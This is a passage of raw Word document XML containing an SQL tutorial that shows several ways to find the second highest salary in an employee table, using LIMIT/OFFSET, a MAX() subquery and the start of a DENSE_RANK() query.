      <w:r w:rsidR="002F0E68" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Employee </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>table?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="700"/>
    </w:p>
    <w:p w14:paraId="1F523C58" w14:textId="4E3908B7" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00EF587F" w:rsidP="0017431B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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Here are a few </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different ways</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get the </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>second highest salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from an employee table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E1BEE2" w14:textId="77777777" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="0017431B">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BFD68E5">
          <v:rect id="_x0000_i2955" style="width:0;height:1.5pt" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F649F71" w14:textId="77777777" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00EF587F" w:rsidP="0017431B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Using LIMIT and OFFSET (MySQL / PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B905A6" w14:textId="77777777" w:rsidR="00F1272E" w:rsidRPr="00393B05" w:rsidRDefault="00C7673D" w:rsidP="00C7673D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DISTINCT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ORDER</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DESC</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LIMIT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="1C00CF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OFFSET</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="1C00CF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B16B32A" w14:textId="13C53BE9" w:rsidR="00C7673D" w:rsidRPr="00393B05" w:rsidRDefault="00C7673D" w:rsidP="00F1272E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LIMIT 1 OFFSET 1 skips the highest salary and fetches the next one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6334FCEB" w14:textId="77777777" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="0017431B">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3ADE7CA">
          <v:rect id="_x0000_i2956" style="width:0;height:1.5pt" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7ADC6" w14:textId="77777777" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00EF587F" w:rsidP="0017431B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Using SUBQUERY with MAX()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F8596" w14:textId="77777777" w:rsidR="00C7673D" w:rsidRPr="00393B05" w:rsidRDefault="00C7673D" w:rsidP="00C7673D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MAX</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(salary) </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> second_highest_salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary &lt; (</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MAX</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(salary) </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1952E8" w14:textId="0FA0A276" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00EF587F" w:rsidP="00C7673D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>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Gets the maximum salary </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less than the highest</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8E4B20" w14:textId="77777777" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="0017431B">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1A21EFA">
          <v:rect id="_x0000_i2957" style="width:0;height:1.5pt" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E4D0FC" w14:textId="77777777" w:rsidR="00EF587F" w:rsidRPr="00393B05" w:rsidRDefault="00EF587F" w:rsidP="0017431B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Using DENSE_RANK() (SQL Server / Oracle / PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3686BC" w14:textId="77777777" w:rsidR="005A5338" w:rsidRPr="00393B05" w:rsidRDefault="005A5338" w:rsidP="005A5338">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary, </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DENSE_RANK</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OVER</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
